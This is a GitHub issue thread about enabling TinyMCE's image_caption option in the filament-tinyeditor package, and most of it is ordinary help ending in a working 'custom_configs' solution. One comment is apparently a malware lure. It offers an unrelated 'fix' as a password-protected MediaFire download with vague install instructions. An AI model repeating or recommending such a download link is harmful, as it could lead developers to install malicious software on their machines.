### ISSUE TITLE
Custom config for image plugin

### ISSUE THREAD

**Issue by TheRealDarkCoder** [amidesfahani/filament-tinyeditor#66]
I am trying to implement image_caption to be true for the image plugin. https://www.tiny.cloud/docs/tinymce/latest/image/#image_caption

Where do i specify this?

I've tried setting it under filament-tinyeditor 

```php
   'extra' => [
        'toolbar' => [
            'fontsize' => '10px 12px 13px 14px 16px 18px 20px',
        ],
       'image_caption' => true
    ],
```

and also in the views
```php
    <div wire:ignore x-ignore ax-load
        ax-load-src="{{ \Filament\Support\Facades\FilamentAsset::getAlpineComponentSrc('tinyeditor', 'amidesfahani/filament-tinyeditor') }}"
        x-load-css="[@js(\Filament\Support\Facades\FilamentAsset::getStyleHref('tiny-css', package: 'amidesfahani/filament-tinyeditor'))]" x-load-js="[@js(\Filament\Support\Facades\FilamentAsset::getScriptSrc($getLanguageId(), package: 'amidesfahani/filament-tinyeditor'))]" x-data="tinyeditor({
             state: $wire.{{ $applyStateBindingModifiers("entangle('{$statePath}')", isOptimisticallyLive: false) }},
             ...
            image_caption: 'true',
            ...

```

None of which worked.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robinmalburn** [comment]
I stumbled upon this whilst looking for support for something else;  you can get this working using `custom_configs` as part of a profile in `config/filament-tinyeditor.php`, like below: 

```php
    'profiles' => [
        'default' => [
            'plugins' => 'accordion autoresize codesample directionality advlist link image lists preview pagebreak searchreplace wordcount code fullscreen insertdatetime media table emoticons',
            'toolbar' => 'undo redo removeformat | fontfamily fontsize fontsizeinput font_size_formats styles | bold italic underline | rtl ltr | alignjustify alignleft aligncenter alignright | numlist bullist outdent indent | forecolor backcolor | blockquote table toc hr | image link media codesample emoticons | wordcount fullscreen',
            'upload_directory' => null,
            'custom_configs' => [
                'image_caption' => true,
            ]
        ],
```

**Comment by TheRealDarkCoder** [comment]
> I stumbled upon this whilst looking for support for something else; you can get this working using `custom_configs` as part of a profile in `config/filament-tinyeditor.php`, like below:
> 
> ```
>     'profiles' => [
>         'default' => [
>             'plugins' => 'accordion autoresize codesample directionality advlist link image lists preview pagebreak searchreplace wordcount code fullscreen insertdatetime media table emoticons',
>             'toolbar' => 'undo redo removeformat | fontfamily fontsize fontsizeinput font_size_formats styles | bold italic underline | rtl ltr | alignjustify alignleft aligncenter alignright | numlist bullist outdent indent | forecolor backcolor | blockquote table toc hr | image link media codesample emoticons | wordcount fullscreen',
>             'upload_directory' => null,
>             'custom_configs' => [
>                 'image_caption' => true,
>             ]
>         ],
> ```

This works! Thanks.
